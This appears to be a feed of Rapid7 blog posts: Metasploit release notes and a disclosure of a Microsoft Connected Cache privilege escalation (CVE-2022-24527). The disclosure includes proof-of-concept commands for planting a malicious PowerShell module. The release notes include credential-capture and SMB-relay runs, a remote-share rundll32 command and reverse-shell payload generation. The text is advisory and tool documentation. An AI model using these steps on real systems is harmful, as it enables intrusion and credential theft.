 * [#16437](<https://github.com/rapid7/metasploit-framework/pull/16437>) from [h00die](<https://github.com/h00die>) - Adds ESXi as a recognizable type on ssh_login.
 * [#16438](<https://github.com/rapid7/metasploit-framework/pull/16438>) from [h00die](<https://github.com/h00die>) - Some SMTP servers only give out credentials when prompted. Now, the module option `AUTHPROMPT` exists to indicate whether or not the auth prompt is required by the server.
 * [#16446](<https://github.com/rapid7/metasploit-framework/pull/16446>) from [zeroSteiner](<https://github.com/zeroSteiner>) - This updates the code for compatibility with the latest RubySMB 3.1 gem.
 * [#16458](<https://github.com/rapid7/metasploit-framework/pull/16458>) from [bcoles](<https://github.com/bcoles>) - The fortios_vpnssl_traversal_creds_leak module has been updated to appropriately attribute the original discoverers of the vulnerability and to credit their original blog post and research presentations.
 * [#16476](<https://github.com/rapid7/metasploit-framework/pull/16476>) from [bcoles](<https://github.com/bcoles>) - The `tools/dev/msftidy.rb` tool has been updated to recommend using CVE datastore references over cve.mitre.org URL references, since this is more maintainable in the long run and will ease the transition when CVE moves to cve.org later this year.
 * [#16477](<https://github.com/rapid7/metasploit-framework/pull/16477>) from [bcoles](<https://github.com/bcoles>) - This PR updates several modules to remove hardcoded URL references to the soon-to-be-deprecated cve.mitre.org site and, where applicable, adds CVE references in place of these hardcoded URL references.

## Bugs fixed (5)

 * [#16318](<https://github.com/rapid7/metasploit-framework/pull/16318>) from [heyder](<https://github.com/heyder>) - Adds support for old key exchange algorithms in the net/ssh lib by setting append_all_supported_algorithms to true.
 * [#16379](<https://github.com/rapid7/metasploit-framework/pull/16379>) from [heyder](<https://github.com/heyder>) - Refactored a number of modules to use ssh_client_defaults.
 * [#16426](<https://github.com/rapid7/metasploit-framework/pull/16426>) from [usiegl00](<https://github.com/usiegl00>) - This fixes a crash in OSX Meterpreter's stager caused by mangled `dyld` functions in MacOS Monterey.
 * [#16457](<https://github.com/rapid7/metasploit-framework/pull/16457>) from [jmartin-r7](<https://github.com/jmartin-r7>) - Recent updates in `Rex::Parser::Arguments` regressed the ability to have short flags with multiple characters. This restores that functionality by updating the spec checks and library code to correctly parse multi-character short flags and each individual short flag specified in a combined short flag.
 * [#16479](<https://github.com/rapid7/metasploit-framework/pull/16479>) from [cdelafuente-r7](<https://github.com/cdelafuente-r7>) - Meterpreter's `reg setval` command has been updated to allow setting a REG_BINARY key value with the `-d` option with an arbitrarily long binary blob. Previously, this value was treated as a string, which led to an incorrect value being set in the registry field.

## Get it

As always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:

 * [Pull Requests 6.1.38...6.1.39](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-04-14T12%3A04%3A47-05%3A00..2022-04-21T11%3A42%3A05-05%3A00%22>)
 * [Full diff 6.1.38...6.1.39](<https://github.com/rapid7/metasploit-framework/compare/6.1.38...6.1.39>)

If you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).

_Source: "Metasploit Weekly Wrap-Up", Rapid7 blog, published 2022-04-22, <https://blog.rapid7.com/2022/04/22/metasploit-weekly-wrap-up-158/>_

On April 12, 2022, Microsoft published [CVE-2022-24527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24527>), a local privilege escalation vulnerability in Microsoft [Connected Cache](<https://docs.microsoft.com/en-us/mem/configmgr/core/plan-design/hierarchy/microsoft-connected-cache>).
The vulnerability allowed a local low-privileged user to execute arbitrary PowerShell as `SYSTEM` due to improper file permission assignment ([CWE-732](<https://cwe.mitre.org/data/definitions/732.html>)).

## Product description

Connected Cache is a feature used by [Microsoft Endpoint Manager](<https://www.microsoft.com/en-us/security/business/microsoft-endpoint-manager>) “[Distribution Points](<https://docs.microsoft.com/en-us/mem/configmgr/core/servers/deploy/configure/install-and-configure-distribution-points#install-a-distribution-point>)” to support “Delivery Optimization.”

## Credit

This issue was discovered and reported by security researcher [Jake Baines](<https://twitter.com/junior_baines>) as part of [Rapid7's vulnerability disclosure program](<https://www.rapid7.com/security/disclosure/#zeroday>).

## Exploitation

When Connected Cache is in use on a Distribution Point, it is installed, in part, into `C:\Doinc\`. Below, you can see that there are some PowerShell scripts within that directory:

    C:\>dir /s /b C:\Doinc\
    C:\Doinc\Product
    C:\Doinc\Product\Install
    C:\Doinc\Product\Install\Logs
    C:\Doinc\Product\Install\Tasks
    C:\Doinc\Product\Install\Tasks\CacheNodeKeepAlive.ps1
    C:\Doinc\Product\Install\Tasks\Maintenance.ps1
    C:\Doinc\Product\Install\Tasks\SetDrivesToHealthy.ps1

Low-privileged users only have `read` and `execute` permissions on the PowerShell scripts.

    C:\Doinc\Product\Install\Tasks>icacls *.ps1
    CacheNodeKeepAlive.ps1 NT AUTHORITY\SYSTEM:(I)(F)
                           NT AUTHORITY\NETWORK SERVICE:(I)(F)
                           BUILTIN\Administrators:(I)(F)
                           BUILTIN\Users:(I)(RX)

    Maintenance.ps1 NT AUTHORITY\SYSTEM:(I)(F)
                    NT AUTHORITY\NETWORK SERVICE:(I)(F)
                    BUILTIN\Administrators:(I)(F)
                    BUILTIN\Users:(I)(RX)

    SetDrivesToHealthy.ps1 NT AUTHORITY\SYSTEM:(I)(F)
                           NT AUTHORITY\NETWORK SERVICE:(I)(F)
                           BUILTIN\Administrators:(I)(F)
                           BUILTIN\Users:(I)(RX)

    Successfully processed 3 files; Failed processing 0 files

The PowerShell scripts are executed every 60 seconds by the Task Scheduler as `NT AUTHORITY\SYSTEM`. All that is fine. The following part is where trouble begins. This is how `SetDrivesToHealthy.ps1` starts:

    try
    {
        import-module 'webAdministration'

        $error.clear()

When `SetDrivesToHealthy.ps1` executes, it attempts to load the `webAdministration` module. Before searching the normal %PSModulePath% path, `SetDrivesToHealthy.ps1` looks for the import in `C:\Doinc\Product\Install\Tasks\WindowsPowerShell\Modules\webAdministration\`. As we saw above, this directory doesn't exist. And while low-privileged users can't modify the Connected Cache PowerShell scripts, they do have sufficient privileges to add subdirectories and files to `C:\Doinc\Product\Install\Tasks\`:

    C:\Doinc\Product\Install>icacls ./Tasks/
    ./Tasks/ NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
             NT AUTHORITY\NETWORK SERVICE:(I)(OI)(CI)(F)
             BUILTIN\Administrators:(I)(OI)(CI)(F)
             BUILTIN\Users:(I)(OI)(CI)(RX)
             BUILTIN\Users:(I)(CI)(AD)
             BUILTIN\Users:(I)(CI)(WD)
             CREATOR OWNER:(I)(OI)(CI)(IO)(F)

An attacker can create the necessary directory structure and place their own `webAdministration` module so that `SetDrivesToHealthy.ps1` will import it. In the proof of concept below, the low-privileged attacker creates the directory structure and creates a PowerShell script that creates the file `C:\r7.txt`.

    C:\Doinc\Product\Install\Tasks>dir C:\
     Volume in drive C has no label.
     Volume Serial Number is 3073-81A6

     Directory of C:\

    01/04/2022  05:01 PM    <DIR>          Doinc
    01/04/2022  05:15 PM    <DIR>          DOINC-E77D08D0-5FEA-4315-8C95-10D359D59294
    01/04/2022  03:48 PM    <DIR>          inetpub
    07/07/2021  04:05 AM    <DIR>          PerfLogs
    01/05/2022  09:29 AM    <DIR>          Program Files
    01/05/2022  09:29 AM    <DIR>          Program Files (x86)
    01/05/2022  09:16 AM    <DIR>          SCCMContentLib
    01/05/2022  09:15 AM    <DIR>          SMSPKGC$
    01/05/2022  09:17 AM    <DIR>          SMSSIG$
    01/05/2022  09:17 AM    <DIR>          SMS_DP$
    01/04/2022  05:04 PM    <DIR>          Users
    01/04/2022  03:48 PM    <DIR>          Windows
                   0 File(s)              0 bytes
                  12 Dir(s)  239,837,327,360 bytes free

    C:\Doinc\Product\Install\Tasks>mkdir WindowsPowerShell

    C:\Doinc\Product\Install\Tasks>mkdir WindowsPowerShell\Modules\

    C:\Doinc\Product\Install\Tasks>mkdir WindowsPowerShell\Modules\webAdministration\

    C:\Doinc\Product\Install\Tasks>echo New-Item C:\r7.txt > WindowsPowerShell\Modules\webAdministration\webAdministration.psm1

    C:\Doinc\Product\Install\Tasks>dir C:\
     Volume in drive C has no label.
     Volume Serial Number is 3073-81A6

     Directory of C:\

    01/04/2022  05:01 PM    <DIR>          Doinc
    01/04/2022  05:15 PM    <DIR>          DOINC-E77D08D0-5FEA-4315-8C95-10D359D59294
    01/04/2022  03:48 PM    <DIR>          inetpub
    01/05/2022  01:49 PM                 0 r7.txt
    07/07/2021  04:05 AM    <DIR>          PerfLogs
    01/05/2022  09:29 AM    <DIR>          Program Files
    01/05/2022  09:29 AM    <DIR>          Program Files (x86)
    01/05/2022  09:16 AM    <DIR>          SCCMContentLib
    01/05/2022  09:15 AM    <DIR>          SMSPKGC$
    01/05/2022  09:17 AM    <DIR>          SMSSIG$
    01/05/2022  09:17 AM    <DIR>          SMS_DP$
    01/04/2022  05:04 PM    <DIR>          Users
    01/04/2022  03:48 PM    <DIR>          Windows
                   1 File(s)              0 bytes
                  12 Dir(s)  239,836,917,760 bytes free

    C:\Doinc\Product\Install\Tasks>icacls C:\r7.txt
    C:\lol.txt NT AUTHORITY\SYSTEM:(I)(F)
               BUILTIN\Administrators:(I)(F)
               BUILTIN\Users:(I)(RX)

    Successfully processed 1 files; Failed processing 0 files

    C:\Doinc\Product\Install\Tasks>

As you can see, the `C:\r7.txt` file is created, demonstrating the privilege escalation.

## Remediation

Follow Microsoft guidance on updating the Distribution Point software. If that is not possible, disabling the caching feature will effectively mitigate this issue.

## Disclosure timeline

**January 5, 2022:** Issue disclosed to the vendor  
**January 5, 2022:** Vendor acknowledgement  
**January 6, 2022:** Vendor assigns a case identifier  
**January 10-11, 2022:** Vendor and researcher discuss clarifying details  
**January 19, 2022:** Vendor confirms the vulnerability  
**February-March 2022:** Vendor and researcher coordinate on disclosure date and CVE assignment  
**April 12, 2022:** Public disclosure (this document)

_**Additional reading:**_

 * _[CVE-2022-1026: Kyocera Net View Address Book Exposure](<https://www.rapid7.com/blog/post/2022/03/29/cve-2022-1026-kyocera-net-view-address-book-exposure/>)_
 * _[Analyzing the Attack Landscape: Rapid7’s 2021 Vulnerability Intelligence Report](<https://www.rapid7.com/blog/post/2022/03/28/analyzing-the-attack-landscape-rapid7s-annual-vulnerability-intelligence-report/>)_
 * _[Cloud Pentesting, Pt. 1: Breaking Down the Basics](<https://www.rapid7.com/blog/post/2022/03/21/cloud-pentesting-pt-1-breaking-down-the-basics/>)_
 * _[CVE-2021-4191: GitLab GraphQL API User Enumeration (FIXED)](<https://www.rapid7.com/blog/post/2022/03/03/cve-2021-4191-gitlab-graphql-api-user-enumeration-fixed/>)_

_Source: "CVE-2022-24527: Microsoft Connected Cache Local Privilege Escalation (Fixed)", Rapid7 blog, published 2022-04-12, <https://blog.rapid7.com/2022/04/12/cve-2022-24527-microsoft-connected-cache-local-privilege-escalation-fixed/>_

Metasploit 6.2.0 has been released, marking another milestone that includes new modules, features, improvements,
and bug fixes. Since Metasploit 6.1.0 (August 2021) until the latest Metasploit 6.2.0 release we’ve added:

 * 138 new modules
 * 148 enhancements and features
 * 156 bug fixes

## Top modules

Each week, the Metasploit team publishes a [Metasploit wrap-up](<https://www.rapid7.com/blog/tag/metasploit-weekly-wrapup/>) with granular release notes for new Metasploit modules. Below is a list of some recent modules that pen testers have told us they are actively using on engagements (with success).

**Remote Exploitation**

 * [VMware vCenter Server Unauthenticated JNDI Injection RCE (via Log4Shell)](<https://github.com/rapid7/metasploit-framework/pull/16050>) by RageLtMan, Spencer McIntyre, jbaines-r7, and w3bd3vil, which exploits [CVE-2021-44228](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell?referrer=blog>): A vCenter-specific exploit leveraging the Log4Shell vulnerability to achieve unauthenticated RCE as `root` / `SYSTEM`. This exploit has been tested on both Windows and Linux targets.
 * [F5 BIG-IP iControl RCE via REST Authentication Bypass](<https://github.com/rapid7/metasploit-framework/pull/16549>) by Heyder Andrade, James Horseman, Ron Bowes, and alt3kx, which exploits [CVE-2022-1388](<https://attackerkb.com/topics/SN5WCzYO7W/cve-2022-1388?referrer=blog>): This module targets CVE-2022-1388, a vulnerability impacting F5 BIG-IP versions prior to 16.1.2.2. By making a special request, an attacker can bypass iControl REST authentication and gain access to administrative functionality. This can be used by unauthenticated attackers to execute arbitrary commands as the `root` user on affected systems.
 * [VMware Workspace ONE Access CVE-2022-22954](<https://github.com/rapid7/metasploit-framework/pull/16512>) by wvu, Udhaya Prakash, and mr_me, which exploits [CVE-2022-22954](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954?referrer=blog>): This module exploits an unauthenticated remote code execution flaw in VMware Workspace ONE Access installations; the vulnerability is being used broadly in the wild.
 * [Zyxel Firewall ZTP Unauthenticated Command Injection](<https://github.com/rapid7/metasploit-framework/pull/16563>) by jbaines-r7, which exploits [CVE-2022-30525](<https://attackerkb.com/topics/LbcysnvxO2/cve-2022-30525?referrer=blog>): This module targets CVE-2022-30525, an unauthenticated remote command injection vulnerability affecting Zyxel firewalls with zero touch provisioning (ZTP) support. Successful exploitation results in remote code execution as the `nobody` user. The vulnerability was [discovered](<https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/>) by Rapid7 researcher [Jake Baines](<https://github.com/jbaines-r7>).

**Local Privilege Escalation**

 * [CVE-2022-21999 SpoolFool Privesc](<https://github.com/rapid7/metasploit-framework/pull/16344>) by Oliver Lyak and Shelby Pace, which exploits [CVE-2022-21999](<https://attackerkb.com/topics/vFYqO85asS/cve-2022-21999?referrer=blog>): A local privilege escalation targeting the spool service on Windows 10 or Server builds 18362 or earlier.
 * [Dirty Pipe Local Privilege Escalation via CVE-2022-0847](<https://github.com/rapid7/metasploit-framework/pull/16303>) by Max Kellermann and timwr, which exploits [CVE-2022-0847](<https://attackerkb.com/topics/UwW7SVPaPv/cve-2022-0847?referrer=blog>): A module targeting a privilege escalation vulnerability in the Linux kernel starting with version 5.8. The module leverages the vulnerability to overwrite a SUID binary in order to gain privileges as the `root` user.

## Capture plugin

Capturing credentials is a critical and early phase in the playbook of many offensive security testers. Metasploit has facilitated this for years with protocol-specific modules all under the `auxiliary/server/capture` namespace. Users can start and configure each of these modules individually, but as of MSF 6.2.0, [a new capture plugin](<https://github.com/rapid7/metasploit-framework/pull/16298>) can also streamline this process for users. The capture plugin currently starts 13 different services (17 including SSL-enabled versions) on the same listening IP address, including remote interfaces via Meterpreter.

After running the `load capture` command, the `captureg` command is available (for Capture-Global), which then offers `start` and `stop` subcommands. A configuration file can be used to select individual services to start.

In the following example, the plugin is loaded, and then all default services are started on the 192.168.123.128 interface:

    msf6 > load capture
    [*] Successfully loaded plugin: Credential Capture
    msf6 > captureg start --ip 192.168.123.128
    Logging results to /home/kali/.msf4/logs/captures/capture_local_20220518185845_205939.txt
    Hash results stored in /home/kali/.msf4/loot/captures/capture_local_20220518185845_846339
    [+] Authentication Capture: DRDA (DB2, Informix, Derby) started
    [+] Authentication Capture: FTP started
    [+] HTTP Client MS Credential Catcher started
    [+] HTTP Client MS Credential Catcher started
    [+] Authentication Capture: IMAP started
    [+] Authentication Capture: MSSQL started
    [+] Authentication Capture: MySQL started
    [+] Authentication Capture: POP3 started
    [+] Authentication Capture: PostgreSQL started
    [+] Printjob Capture Service started
    [+] Authentication Capture: SIP started
    [+] Authentication Capture: SMB started
    [+] Authentication Capture: SMTP started
    [+] Authentication Capture: Telnet started
    [+] Authentication Capture: VNC started
    [+] Authentication Capture: FTP started
    [+] Authentication Capture: IMAP started
    [+] Authentication Capture: POP3 started
    [+] Authentication Capture: SMTP started
    [+] NetBIOS Name Service Spoofer started
    [+] LLMNR Spoofer started
    [+] mDNS Spoofer started
    [+] Started capture jobs

Opening a new terminal in conjunction with the `tail` command will show everything that has been captured. For instance, NTLMv2-SSP details through the SMB capture module:

    $ tail -f ~/.msf4/logs/captures/capture_local_20220518185845_205939.txt

    [+] Received SMB connection on Auth Capture Server!
    [SMB] NTLMv2-SSP Client     : 192.168.123.136
    [SMB] NTLMv2-SSP Username   : EXAMPLE\Administrator
    [SMB] NTLMv2-SSP Hash       : Administrator::EXAMPLE:1122334455667788:c77cd466c410eb0721e4936bebd1c35b:...

It is also possible to log directly to stdout without using the `tail` command:

    captureg start --ip 192.168.123.128 --stdout

## SMB v3 server support

This work builds upon the SMB v3 client support [added in Metasploit 6.0](<https://www.rapid7.com/blog/post/2020/08/06/metasploit-6-now-under-active-development/>).

Metasploit 6.2.0 contains a new standalone tool for spawning an SMB server that allows read-only access to the current working directory. This new SMB server functionality supports SMB v1/2/3, as well as encryption support for SMB v3.

Example usage:

    ruby tools/smb_file_server.rb --share-name home --username metasploit --password password --share-point

This can be useful for copying files onto remote targets, or for running remote DLLs:

    copy \\192.168.123.1\home\example.txt .
    rundll32.exe \\192.168.123.1\home\example.dll,0

All remaining Metasploit modules have now been updated to support SMB v3. Some examples:

 * `exploit/windows/smb/smb_delivery`: This module outputs a rundll32 command that you can invoke on a remote machine to open a session, such as `rundll32.exe \\192.168.123.128\tHKPx\WeHnu,0`
 * `exploit/windows/smb/capture`: This module creates a mock SMB server that accepts credentials before returning `NT_STATUS_LOGON_FAILURE`. It supports SMB v1, SMB v2, and SMB v3 and captures NTLMv1 and NTLMv2 hashes, which can be used for offline password cracking.
 * `exploit/windows/dcerpc/cve_2021_1675_printnightmare`: This update is an improved, all-inclusive exploit that uses the new SMB server, making it unnecessary for the user to deal with Samba.
 * `exploit/windows/smb/smb_relay`: Covered in more detail below.

## Enhanced SMB relay support

The `windows/smb/smb_relay` module has been updated so users can now relay over SMB versions 2 and 3. In addition, the module can now select multiple targets that Metasploit will intelligently cycle through to ensure that it is not wasting incoming connections.

Example module usage:

    use windows/smb/smb_relay
    set RELAY_TARGETS 192.168.123.4 192.168.123.25
    set JOHNPWFILE ./relay_results.txt
    run

Incoming requests have their hashes captured, as well as being relayed to additional targets to run psexec:

    msf6 exploit(windows/smb/smb_relay) > [*] New request from 192.168.123.22
    [*] Received request for \admin
    [*] Relaying to next target smb://192.168.123.4:445
    [+] identity: \admin - Successfully authenticated against relay target smb://192.168.123.4:445
    [SMB] NTLMv2-SSP Client     : 192.168.123.4
    [SMB] NTLMv2-SSP Username   : \admin
    [SMB] NTLMv2-SSP Hash       : admin:::ecedb28bc70302ee:a88c85e87f7dca568c560a49a01b0af8:...

    [*] Received request for \admin
    [*] identity: \admin - All targets relayed to
    [*] 192.168.123.4:445 - Selecting PowerShell target
    [*] Received request for \admin
    [*] identity: \admin - All targets relayed to
    [*] 192.168.123.4:445 - Executing the payload...
    [+] 192.168.123.4:445 - Service start timed out, OK if running a command or non-service executable...
    [*] Sending stage (175174 bytes) to 192.168.123.4
    [*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.4:52771 ) at 2022-03-02 22:24:42 +0000

A session will be opened on the relay target with the associated credentials:

    msf6 exploit(windows/smb/smb_relay) > sessions

    Active sessions
    ===============

      Id  Name  Type                     Information                            Connection
      --  ----  ----                     -----------                            ----------
      1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ DESKTOP-N3MAG5R  192.168.123.1:4444 -> 192.168.123.4:52771 (192.168.123.4)

Further details can be found in the [Metasploit SMB Relay documentation](<https://github.com/rapid7/metasploit-framework/blob/3b524360ed8c40ff765aa3db5de96a441387035f/documentation/modules/exploit/windows/smb/smb_relay.md>).

## Improved pivoting / NATed services support

Metasploit has added features to libraries that provide listening services (like HTTP, FTP, LDAP, etc.) to allow them to be bound to an explicit IP address and port combination that is independent of what is typically the SRVHOST option. This is particularly useful for modules that may be used in scenarios where the target needs to connect to Metasploit through either a NAT or port-forward configuration. The use of this feature mimics the existing functionality that’s provided by the reverse_tcp and reverse_http(s) payload stagers.

When a user needs the target to connect to 10.2.3.4, the Metasploit user would set that as the SRVHOST. If, however, that IP address is the external interface of a router with a port forward, Metasploit won’t be able to bind to it. To fix that, users can now set the ListenerBindAddress option to one that Metasploit can listen on: in this case, the IP address that the router will forward the incoming connection to.

For example, with the network configuration:

Private IP: 172.31.21.26 (where Metasploit can bind to)  
External IP: 10.2.3.4 (where the target connects to Metasploit)

The Metasploit module commands would be:

    # Set where the target connects to Metasploit. ListenerBindAddress is a new option.
    set srvhost 10.2.3.4
    set ListenerBindAddress 172.31.21.26

    # Set where Metasploit will bind to. ReverseListenerBindAddress is an existing option.
    set lhost 10.2.3.4
    set ReverseListenerBindAddress 172.31.21.26

## Debugging Meterpreter sessions

There are now two ways to debug Meterpreter sessions:

 1. Log all networking requests and responses between msfconsole and Meterpreter, i.e. TLV packets
 2. Generate a custom Meterpreter debug build with extra logging present

**Log Meterpreter TLV packets**

This can be enabled for any Meterpreter session and does not require a special debug Metasploit build:

    msf6 > setg SessionTlvLogging true
    SessionTlvLogging => true

Here’s an example of logging the network traffic when running the `getenv` Meterpreter command:

    meterpreter > getenv USER

    SEND: #<Rex::Post::Meterpreter::Packet type=Request tlvs=[
      #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID meta=INT value=1052 command=stdapi_sys_config_getenv>
      #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID meta=STRING value="73717259684850511890564936718272">
      #<Rex::Post::Meterpreter::Tlv type=ENV_VARIABLE meta=STRING value="USER">
    ]>

    RECV: #<Rex::Post::Meterpreter::Packet type=Response tlvs=[
      #<Rex::Post::Meterpreter::Tlv type=UUID meta=RAW value="Q\xE63_onC\x9E\xD71\xDE3\xB5Q\xE24">
      #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID meta=INT value=1052 command=stdapi_sys_config_getenv>
      #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID meta=STRING value="73717259684850511890564936718272">
      #<Rex::Post::Meterpreter::Tlv type=RESULT meta=INT value=0>
      #<Rex::Post::Meterpreter::GroupTlv type=ENV_GROUP tlvs=[
        #<Rex::Post::Meterpreter::Tlv type=ENV_VARIABLE meta=STRING value="USER">
        #<Rex::Post::Meterpreter::Tlv type=ENV_VALUE meta=STRING value="demo_user">
      ]>
    ]>

    Environment Variables
    =====================

    Variable  Value
    --------  -----
    USER      demo_user

**Meterpreter debug builds**

We have added additional options to Meterpreter payload generation for generating debug builds that have additional log statements present. These payloads can be useful for debugging Meterpreter sessions, when developing new Meterpreter features, or for raising Metasploit issue reports. To choose a prebuilt Meterpreter payload with debug functionality present, set `MeterpreterDebugBuild` to true. There is also configuration support for writing the log output to stdout or to a file on the remote target by setting `MeterpreterDebugLogging` to `rpath:/tmp/meterpreter_log.txt`.

For example, within msfconsole you can generate a new payload and create a handler:

    use payload/python/meterpreter_reverse_tcp
    generate -o shell.py -f raw lhost=127.0.0.1 MeterpreterDebugBuild=true MeterpreterTryToFork=false
    to_handler

Running the payload will show the Meterpreter log output:

    $ python3 shell.py
    DEBUG:root:[*] running method core_negotiate_tlv_encryption
    DEBUG:root:[*] Negotiating TLV encryption
    DEBUG:root:[*] RSA key: ...
    DEBUG:root:[*] AES key: 0x121565e60770fccfc7422960bde14c12193baa605c4fdb5489d9bbd6b659f966
    DEBUG:root:[*] Encrypted AES key: ...
    DEBUG:root:[*] TLV encryption sorted
    DEBUG:root:[*] sending response packet
    DEBUG:root:[*] running method core_set_session_guid
    DEBUG:root:[*] sending response packet
    DEBUG:root:[*] running method core_enumextcmd
    DEBUG:root:[*] sending response packet
    DEBUG:root:[*] running method core_enumextcmd
    DEBUG:root:[*] sending response packet
    ... etc ...

For full details, see the [Debugging Meterpreter Sessions documentation](<https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html>).

## User-contributable docs

We have now released user-contributable documentation for Metasploit, available at <https://docs.metasploit.com/>. This new site provides a searchable source of information for multiple topics including:

 * [Common Metasploit workflows](<https://docs.metasploit.com/docs/pentesting/>)
 * [Upgrading shells to Meterpreter](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-upgrading-shells-to-meterpreter.html>)
 * [Kubernetes](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-kubernetes.html>)
 * [MySQL](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-mysql.html>)
 * [PostgreSQL](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-postgresql.html>)
 * [SMB](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-smb.html>)
 * [SSH](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-ssh.html>)
 * [WinRM](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-winrm.html>)
 * [Installation guides](<https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html>)
 * [Module development resources](<https://docs.metasploit.com/docs/development/developing-modules/guides/>)
 * ...
and more!\n\nContributions are welcome, and the Markdown files can now be found within the Metasploit framework repo, under the [docs folder](<https://github.com/rapid7/metasploit-framework/tree/master/docs>).\n\n## Local exploit suggester improvements\n\nThe `post/multi/recon/local_exploit_suggester` post module can be used to iterate through multiple relevant Metasploit modules and automatically check for local vulnerabilities that may lead to privilege escalation.\n\nNow with Metasploit 6.2, this module has been updated with a number of bug fixes, as well as improved UX that more clearly highlights which modules are viable:\n \n \n msf6 post(multi/recon/local_exploit_suggester) > run session=-1\n ... etc ...\n [*] ::1 - Valid modules for session 3:\n ============================\n # Name Potentially Vulnerable? Check Result\n - ---- ----------------------- ------------\n 1 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec Yes The target is vulnerable.\n 2 exploit/linux/local/cve_2022_0847_dirtypipe Yes The target appears to be vulnerable. Linux kernel version found: 5.14.0\n 3 exploit/linux/local/cve_2022_0995_watch_queue Yes The target appears to be vulnerable.\n 4 exploit/linux/local/desktop_privilege_escalation Yes The target is vulnerable.\n 5 exploit/linux/local/network_manager_vpnc_username_priv_esc Yes The service is running, but could not be validated.\n 6 exploit/linux/local/pkexec Yes The service is running, but could not be validated.\n 7 exploit/linux/local/polkit_dbus_auth_bypass Yes The service is running, but could not be validated. 
Detected polkit framework version 0.105.\n 8 exploit/linux/local/su_login Yes The target appears to be vulnerable.\n 9 exploit/android/local/futex_requeue No The check raised an exception.\n 10 exploit/linux/local/abrt_raceabrt_priv_esc No The target is not exploitable.\n 11 exploit/linux/local/abrt_sosreport_priv_esc No The target is not exploitable.\n 12 exploit/linux/local/af_packet_chocobo_root_priv_esc No The target is not exploitable. Linux kernel 5.14.0-kali4-amd64 #1 is not vulnerable\n 13 exploit/linux/local/af_packet_packet_set_ring_priv_esc No The target is not exploitable.\n 14 exploit/linux/local/apport_abrt_chroot_priv_esc No The target is not exploitable.\n 15 exploit/linux/local/asan_suid_executable_priv_esc No The check raised an exception.\n 16 exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc No The target is not exploitable.\n \n\nSetting the option `verbose=true` will now also highlight modules that weren\u2019t considered as part of the module suggestion phase due to session platform/arch/type mismatches. 
This is useful for evaluating modules that may require manually migrating from a shell session to Meterpreter, or from a Python Meterpreter to a native Meterpreter to gain local privilege escalation.\n\n## Upcoming roadmap work\n\nIn addition to the normal module development release cycle, the Metasploit team has now begun work on adding Kerberos authentication support as part of a planned Metasploit 6.3.0 release.\n\n## Get it\n\nExisting Metasploit Framework users can update to the latest release of Metasploit Framework via the `msfupdate` command.\n\nNew users can either download the latest release through our [nightly installers](<https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html>), or if you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest release.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-09T16:39:00", "type": "rapid7blog", "title": "Announcing Metasploit 6.2", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 
10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-0847", "CVE-2022-1388", "CVE-2022-21999", "CVE-2022-22954", "CVE-2022-30525"], "modified": "2022-06-09T16:39:00", "id": "RAPID7BLOG:02EDDA927928C11A6D10A4A0D17823AF", "href": "https://blog.rapid7.com/2022/06/09/announcing-metasploit-6-2/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-19T21:29:45", "description": "\n\nFrom Defender to Windows, Office to Azure, this month\u2019s Patch Tuesday has a large swath of Microsoft\u2019s portfolio getting vulnerabilities fixed. 119 CVEs [were addressed today](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Apr>), not including the 26 Chromium vulnerabilities that were fixed in the Edge browser.\n\nOne of these has been observed being exploited in the wild: [CVE-2022-24521](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24521>), reported to Microsoft by the National Security Agency, affects the Common Log File System Driver in all supported versions of Windows and allows attackers to gain additional privileges on 